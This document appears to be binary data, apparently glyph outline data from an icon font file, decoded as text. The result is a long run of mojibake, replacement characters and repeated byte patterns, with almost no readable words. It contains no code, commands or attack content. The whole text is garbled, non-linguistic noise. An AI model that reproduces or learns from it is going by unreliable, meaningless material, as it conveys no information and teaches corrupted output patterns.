 @%%`�@

����1>GS\!2#!"&=463#+"&=46;234&+";26573532654&+732654&#3532654&+32654&# (88(��(88(� 
 

 
 & &% &  @&%` @

` @&%` @

�8(�(88(�(8�

`

%%`&%`�`%%@ @

 �`%% @

����!)BP[!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#33##546;2#'"354&+ (88(��(88(%& %&��@ @�@@

``&%``@�` & % @
`
 �8(�(88(�(8 &�%&�%`��  `@
`
 %`&� `�%%��
  
����1?J!2#!"&=4633535##"&=46;5#";5#33354&+"357"354&+ (88(��(88(@ @�@@

``&%``@� % &  
`
 �8(�(88(�(8���  `@
`
 %`&� `�%%�``
  
����!-8BL!2#!"&=463"3!26=4&#!'373#'#'32+5326=4&#535#3535 (88(��(88(%& %&��@ 00 @@ 00 �`%&` @

@�� `�8(�(88(�(8 &�%&�%�pTTppTT�&`%� �
`
@@ �` ����'1;!2#!"&=463373'7#'##326=4&+326=4&#535#3535 (88(��(88(@ 00 @@ 00 �`&%` @

@�� `�8(�(88(�(8�pTTppTT�%`& �
`
@@ �` ����!,6GXy!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&++"&=46;2#4&+";2653 (88(��(88(%& %&��`%&` @

� %& %&

 

  & %& & 
 

 
 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

����%6Gh!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+#+"&=46;234&+";265 (88(��(88(`&%` @

�&% &% 

 

   
 

 
 & &% &�8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%����!1BMW_!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#33535# (88(��(88(%& %&��@ %& %&

 

 �`%&` @

� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
��  ���� 1<FN!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#33535# (88(��(88(@&% &% 

 

 �`&%` @

� @��8(�(88(�(8`%`&%`& 
`

`
 �%`& �
`
��  ����!-3b!2#!"&=463"3!26=4&#!'373#'#%#537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%����"P"3!26=4&#!'373#'#%#53732#4&+";2+"&5131;2654&+"&546(88( (88(��@@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�8(�(88(�(8�pTTppTT  �%


%%&


%%@���*4DUv�!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT@���$4Efr!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#��(88(� (88(`&%` @

�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT����!.7CLT!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#!3535# (88(��(88(%& %&��`%&@  @

��`%&@  @

` @��8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

��  ����&2;C!2#!"&=4633532654&+732654&#3532654&+32654&#!3535# (88(��(88(� @&%` @

�� @&%` @

` @��8(�(88(�(8��`%%@ @

 �`%% @

��  ����!/:iu~!2#!"&=463"3!26=4&#!##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&# (88(��(88(%& %&��` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 %%


&%%


%@@%%`�@

����)Xdm!2#!"&=463354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&# (88(��(88(� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�8(�(88(�(8�`�%%�``
  
 %%


&%%


%@�`%% @

����!-N}!2#!"&=463"3!26=4&#!#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%`�  �  �%&`%%

`

�%%


&%%


%����=l!2#!"&=463#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+ (88(��(88(@ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �8(�(88(�(8��  �  �

`

%%`&%�%%


&%%


%����!/:EOW!2#!"&=463"3!26=4&#!##546;2#'"354&+%32+5326=4&#!3535# (88(��(88(%& %&��@` & % @
`
 �`%&` @

` @��8(�(88(�(8 &�%&�%�`�%%��
  
 &`%� �
`
��  ����)4>F!2#!"&=463354&+"357"354&+%326=4&+326=4&#!3535# (88(��(88(@ % &  
`
 �`&%` @

` @��8(�(88(�(8�`�%%�``
  
 �%`& �
`
��  ����!-:@!2#!"&=463"3!26=4&#!'373#'#%'#353735##53 (88(��(88(%& %&��@@ 00 @@ 00 0       � �8(�(88(�(8 &�%&�%�pTTppTT�`�@@�� �����)/"3!26=4&#!'373#'#%73#5#'#53#53(88( (88(��@@ 00 @@ 00 0       @� �8(�(88(�(8�pTTppTT�`�@@�� �����!.;A!2#!"&=463"3!26=4&#!#5'53753'#353735##53 (88(��(88(%& %&��` @ 00 p0       � �8(�(88(�(8 &�%&�%�```  HH  @`�@@�� �����*0"3!26=4&#!#5'5375373#5#'#53#53(88( (88(��` @ 00 p0       @� �8(�(88(�(8�```  HH  @`�@@�� �����!-!2#!"&=463"3!26=4&#!53#5##53 (88(��(88(%& %&��@  `  �8(�(88(�(8 &�%&�%�`�``�`����"3!26=4&#!53#5##53(88( (88(��@  `  �8(�(88(�(8�`�``�`����!-9E!2#!"&=463"3!26=4&#!3#53#37'373#'#73#53#3 (88(��(88(%& %&�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8 &�%&�%�@ � @ pTTppTT`@ � @ ����(4"3!26=4&#!3#53#37'373#'#73#53#3(88( (88(�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8�@ � @ pTTppTT`@ � @ ��`�!/:AM!2#!"&=463"3!26=4&#!##546;2#'"354&+73#'3#35#535#� (88(��(88(%& %&��` & % @
`
 �0 @ @ � `  `�8(�(88(�(8 &�%&�%�`�%%��
  
���� �  �  ��`�)0<"3!26=4&#!##546;2#'"354&+73#'3#53#3#53�(88( (88(��` & % @
`
 �0 @ @ � `  ` �8(�(88(�(8�`�%%��
  
����   �  ����!,6BK[l!2#!"&=463"3!26=4&#!32+5326=4&#532+#732654&#%32+"&=46";26=4&+ (88(��(88(%& %&��`%&` @

``%&@  @

�` %& %&

 

 �8(�(88(�(8 &�%&�%@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
����%1:J[!2#!"&=463326=4&+326=4&#3532654&+32654&#%";26=4&#";26=4&+ (88(��(88(�`&%` @

` @&%` @

�`&% &% 

 

 �8(�(88(�(8`�%`& �
`
 �`%% @

 %`&%`& 
`

`
@���*4DU]i!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&+33535#'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

 � @�@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT@���$4EMY!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+33535#373'7#'#��(88(� (88(`&%` @

�&% &% 

 

 � @�@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT@���+1`l!2#!"&=46"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#��(88(� (88(&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00 �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%ppTTppTT@���!O["3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#�(88(�(88(�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �8(�(88(�(8�pTTppTT  �%


%%&


%%ppTTppTT����!1BMW�!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 �`%&` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%���� 1<Fu!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 �`&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`

`
 �%`& �
`
 %%


&%%


%����!.7CL{!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

 %%


&%%


%����&2;j!2#!"&=4633532654&+732654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �8(�(88(�(8��`%%@ @

 �`%% @

 %%


&%%


%����!,6GX`!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&+33535# (88(��(88(%& %&��`%&` @

� %& %&

 

 � @��8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  ����%6GO!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+33535# (88(��(88(`&%` @

�&% &% 

 

 � @��8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  ����!)5=!2#!"&=463"3!26=4&#!3535#'373#'#%3535# (88(��(88(%& %&��@ @�@ 00 @@ 00  @��8(�(88(�(8 &�%&�%`��  PpTTppTT���  ����$,!2#!"&=4633535#373'7#'#3535# (88(��(88(@ @�@ 00 @@ 00  @��8(�(88(�(8���  PpTTppTT ��  ����!/8@J!2#!"&=463"3!26=4&#!##532##'32654&#33535#535#3535 (88(��(88(%& %&��: `%%@&Z@

� @�� `�8(�(88(�(8 &�%&�%�`�%%`�@

��  @@ �` ����'/9!2#!"&=4633'2654&+35532654&#33535#535#3535 (88(��(88(:@&@%%` @

� @�� `�8(�(88(�(8�``%%�``@

��  @@ �` ����!.1<C!2#!"&=463"3!26=4&#!'#353735##73535#5#73#'3 (88(��(88(%& %&��P0       �::    `0 @ @ �8(�(88(�(8 &�%&�%�`�@@��Pp@@ �� ������� +2!2#!"&=463'#353735#53535#5#'#37# (88(��(88(P0       �::    `0 @ @ �8(�(88(�(8�`�@@��PP @@ �� �������!+18!2#!"&=463"3!26=4&#!535#3535#53?3#'3 (88(��(88(%& %&�� �� `� �0 @ @ �8(�(88(�(8 &�%&�%�@ �` ` �������� '"3!26=4&#!3##53##53?3#'3(88( (88(�� `` ��@� �0 @ @ �8(�(88(�(8� `� � ��������!.;D]!2#!"&=463"3!26=4&#!'#353735#532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��P0       @`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%�`�@@��@@%%`� @

`@
`
 %`&� ����*3L!2#!"&=463'#353735#3532654&+732654&##"&=46;5#";5#3 (88(��(88(P0       @ @&%` @

�@

``&%``@�8(�(88(�(8�`�@@��@�`%%@ @

`@
`
 %`&� ����*;LT7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!3535#�% &% 

 
,"� (88(��(88(%& %&��` @�D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%`��  ����*;C+"&=46;2''#"&=46;2'"3!26=4&#!#53##� %& %

 
,"�(88( (88(��`@�@ D&`%&`	
`

`
," 8(�(88(�(8�  �����!.:EO!2#!"&=463"3!26=4&#!'#353735##35#535#732+5326=4&# (88(��(88(%& %&��p0       ` `  `�`%&` @

�8(�(88(�(8 &�%&�%�`�@@�� �  �   &`%� �
`
����)4>!2#!"&=463'#353735##35#535#7326=4&+326=4&# (88(��(88(p0       ` `  `�`&%` @

�8(�(88(�(8�`�@@�� �  �   �%`& �
`
����!Ngs|!2#!"&=463"3!26=4&#!46;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&# (88(��(88(%& %&��& %

& % 
 

  

 
 @

``&%``@@`%&@  @

�8(�(88(�(8 &�%&�%�%%		%%


 


@@
`
 %`&� @@%%`�@

����>Wcl!2#!"&=463346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&# (88(��(88( 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�8(�(88(�(8�


 


%%		%%@@
`
 %`&� @�`%% @

`���-8DNX!2#!"&=46"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535��(88(�`(88(&%�&%��` & % @
`
 � `  `��� ``�� `�8(�(88(�(8 &�%&�%�`�%%��
  
�  �  @@ �` @ �` `���(4>H!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535��(88(�`(88� % &  
`
 � `  `��� ``�� `�8(�(88(�(8�`�%%�``
  
�  �  @@ �` @ �` ����!/:HSt!2#!"&=463"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653 (88(��(88(%& %&��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8 &�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

����)7Bc"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653(88( (88(��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8�`�%%��
  
``�%%��
  
�%&`%%

`

����!/=HO!2#!"&=463"3!26=4&#!#'#5373537##546;2#'"354&+73#'3 (88(��(88(%& %&��00      �` & % @
`
 �0 @ @ �8(�(88(�(8 &�%&�%��``�@@��``�%%��
  
��������,7>"3!26=4&#!#'#5373537##546;2#'"354&+73#'3(88( (88(��00      �` & % @
`
 �0 @ @ �8(�(88(�(8��``�@@��``�%%��
  
��������!+7CL!2#!"&=463"3!26=4&#!75#3357#35#535#532+#732654&# (88(��(88(%& %&��@�����@ `  `�`%&@  @

�8(�(88(�(8 &�%&�%��  �  ��  �   @%%`�@

����&2;!2#!"&=46375#3357#35#535#3532654&+32654&# (88(��(88(@�����@ `  `� @&%` @

�8(�(88(�(8��  �  ��  �   �`%% @

����!1BJR!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#!3535# (88(��(88(%& %&��@ %& %&

 

 � @� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��  ��  ���� 19A!2#!"&=463";26=4&#";26=4&+33535#!3535# (88(��(88(@&% &% 

 

 � @� @��8(�(88(�(8`%`&%`& 
`

`
��  ��  ����!)BL!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#375#335 (88(��(88(%& %&��@ @�@@

``&%``@`������8(�(88(�(8 &�%&�%`��  `@
`
 %`&� @�  �  ����1;!2#!"&=4633535##"&=46;5#";5#375#335 (88(��(88(@ @�@@

``&%``@`������8(�(88(�(8���  `@
`
 %`&� @�  �  ����!,6C\!2#!"&=463"3!26=4&#!32+5326=4&#'#353735##"&=46;5#";5#3 (88(��(88(%& %&��`%&` @

�0       �@

``&%``@�8(�(88(�(8 &�%&�%@&`%� �
`
@`�@@��@
`
 %`&� ����%2K!2#!"&=463326=4&+326=4&#'#353735##"&=46;5#";5#3 (88(��(88(`&%` @

�0       �@

``&%``@�8(�(88(�(8`�%`& �
`
@`�@@��@
`
 %`&� ����!-[k|!2#!"&=463"3!26=4&#!#35#535#7";2+"&51#1;2654&+"&546;234&#;2+"&=46";26=4&+ (88(��(88(%& %&��@ `  `�&% 

 
 % &% 

 
 %� %& %&

 

 �8(�(88(�(8 &�%&�%`�  �   %%


&%%


%&`%&`% 
`

`
����J[l!2#!"&=463#35#535#7";2+"&51#1;2654&+"&546;234&#3";26=4&+";26=4&+ (88(��(88(@ `  `�&% 

 
 % &% 

 
 %�&% &% 

 

 �8(�(88(�(8��  �   %%


&%%


%%`&%`& 
`

`
����!/8FQ_h!2#!"&=463"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&# (88(��(88(%& %&��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8 &�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

����'5@NW"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&#(88( (88(��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8�`�%%`�@

``�%%��
  
``�%%`�@

����!:FP!2#!"&=463"3!26=4&#!#"&=46;5#";5#37#35#535#535#3535 (88(��(88(%& %&��@

``&%``@` `  `��� `�8(�(88(�(8 &�%&�%�@
`
 %`&� `�  �  @@ �` ����)5?!2#!"&=463#"&=46;5#";5#37#35#535#535#3535 (88(��(88(�@

``&%``@` `  `��� `�8(�(88(�(8�@
`
 %`&� `�  �  @@ �` @`	+Dahx#5353#73+"&=3;26='#353735#'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46�  `  � & % 
 
�0       ��&%�%(88(� 
� 

@%��(88(��v
` &%��&%��ࠠ��%&��

�``�@@��``�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@�`"2<Q^%#!"&5463!;!"3!;"3!26=4&##5353#73+"&=3;26=73#5#'#53�%� %&@&���(88( �
���%& %&�  `  � & % 
 
�0       �@%&�&�%@8(�(8�
�&�%&�%��ࠠ��%&��

�``�@@��@`$AHXa��3532654&+%5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=463!2#!"&5732+%";2+"&51#1;2654&+"&546;234&+#"&=46;5#";5#3� @&%` ���&%�%(88(� 
� 

@%��(88(��v
�% &%��&`@

@�&% 

 
 % &% 

 
 % �@

``&%``@��`%%``�&� &%@8(�(8�`@

�
�%@8(�(8��
���&%�&%�

`%%


&%%


%�@
`
 %`&� @�`"2KW`�%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#3%3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[@

``&%``@�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� @�`%% @

 %%


&%%


%
@`5<LZeqz��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �`%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 @%%`�@

 @%%`�@

	@�`"2@KW`lu%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 � @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �`%% @

 �`%% @

@`5<LXak�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5353#7#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 �ࠠ�`@
`
 %`&� @�`"2>GQj%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#35#'#3%#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `   @

``&%``@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �ࠠ�`@
`
 %`&� 	@`5<LVbkv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535%532+#732654&#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%��� `�`%&@  @

``%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �`  @%%`�@

 &`%� �
`
@�`"2<HQ\g%#!"&5463!;!"3!;!2#!"&=46535#3535%3532654&+32654&#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%��� `� @&%` @

``&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�@ �`  �`%% @

 �%`& �
`
@`5<LY���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#46;2+"&53;2654&+532654&+"#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       & %

& % 
 

  

 
�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@%%		%%


 


@%%`�@

@�`"2?lx�%#!"&5463!;!"3!;!2#!"&=46'#353735#346;2+32+"&5#;2654&'>54&+"3532654&+32654&#�%� %&@&���(88( �
��� &%��&%k0        
 

  

 
 % &

% &� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@


 


%%		%%�`%% @

	@`5<LOZgs|5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#73535#5#%'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�::    `��0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�Pp@@ �� @`�@@��@@%%`�@

@�`"25@MYb%#!"&5463!;!"3!;!2#!"&=4653535#5#%'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%�::    `��0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�PP @@ �� @`�@@��@�`%% @

@`5<L\mz�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+'#353735#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&% %& %&

 

 �0       P0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
@`�@@�ਨ��@�`"2CTah%#!"&5463!;!"3!;!2#!"&=46";26=4&+";26=4&+'#353735#'#37#�%� %&@&���(88( �
��� &%��&%&% &% 

 

 �0       P0 @ @ �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
@`�@@�ਨ��@`5<Lamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46;26=#+"&=#7532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%% & 
 
 �`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&� &%��

 @@%%`�@

`@
`
 %`&� @�`"2GS\u%#!"&5463!;!"3!;!2#!"&=46;26=#+"&=#73532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%% & 
 
 � @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&� &%��

 @�`%% @

`@
`
 %`&� @`5<LXcp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#3#5373#%#5'53753����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�����`��  V*pp*j @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ 
V�VVpp````  HH  @�`"2>IV%#!"&5463!;!"3!;"3!26=4&#3#53#3#5373#%#5'53753�%� %&@&���(88( �
���%& %&������`��  V*pp*j @ 00 �@%&�&�%@8(�(8�
�&�%&�%�@ � @ 
V�VVpp````  HH  `5<LRZfs!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&##53%3535#53#5##53!'#353735#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� �� @�@  `  �0        8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%� ���  @`�``�``�@@���`"28@LY%#!"&5463!;!"3!;!2#!"&=46#5#3%3535##5#35335#'#353735#`%� %&@&��`(88(��
��`�&&� &&�� ��  @�@`  `  P0       �@%&�&�%@8(�(8�
�%�&%�&����  @`�``�``�@@��@`5<Lm��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

�%%


&%%


%%%


&%%


%@�`"2S��%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%�%%


&%%


%%%


&%%


%
`5<LShv���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%��� &%��

 `�%%��
  
``�%%��
  
	�`"29N\gu�%#!"&5463!;!"3!;"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+`%� %&@&��`(88(��
��`&&�&&��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%��� 

��%& `�%%��
  
``�%%��
  
	@`5<LXa���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 %%


&%%


%&`%� �
`
@�`"2>Gv��%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&+�%� %&@&���(88( �
��� &%��&% @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 %%


&%%


%�%`& �
`
@`5<LXfq5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535###546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ `  ``` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  ``�%%��
  
@�`"2>LW%#!"&5463!;!"3!;"3!26=4&##53#3#53'##546;2#'"354&+�%� %&@&���(88( �
���%& %&� `  ` �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%`  �  @`�%%��
  

@`5<L\en{��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+732654&#32654&#7'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%

&` @

@@

�0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�x%		%�@

`@

 `�@@��@@%%`�@

	@�`"2BKTamv%#!"&5463!;!"3!;!2#!"&=4632654&'>54&+32654&#32654&#7'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%`&

%` @

@@

�0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�h%		% @

`@

 `�@@��@�`%% @

@`5<LZep�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#537353%32+5326=4&+#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k00      ��`%&` @

@�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@���&`%� �
`
`@
`
 %`&� @�`"2@KVo%#!"&5463!;!"3!;!2#!"&=4635#'#5#37%326=4&+326=4&+#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k      00��`&%` @

@�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&���@@��``��%`& �
`
`@
`
 %`&� @`5<LXdm�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37532+#732654&#7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`@`%&@  @

�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ @@%%`�@

 %%


&%%


%@�`"2>JS�%#!"&5463!;!"3!;!2#!"&=4635#535#35#73532654&+32654&#7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%;``����� @&%` @

�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&� @ � ��`%% @

 %%


&%%


%`5<LT`jt!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#3535#3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%�� @�� `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%`��  �  �  @@ �` @ �` �`"2:FPZ%#!"&5463!;!"3!;!2#!"&=463535#3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&Z @�� `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&`��  �  �  @@ �` @ �` @`5<L\mu�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
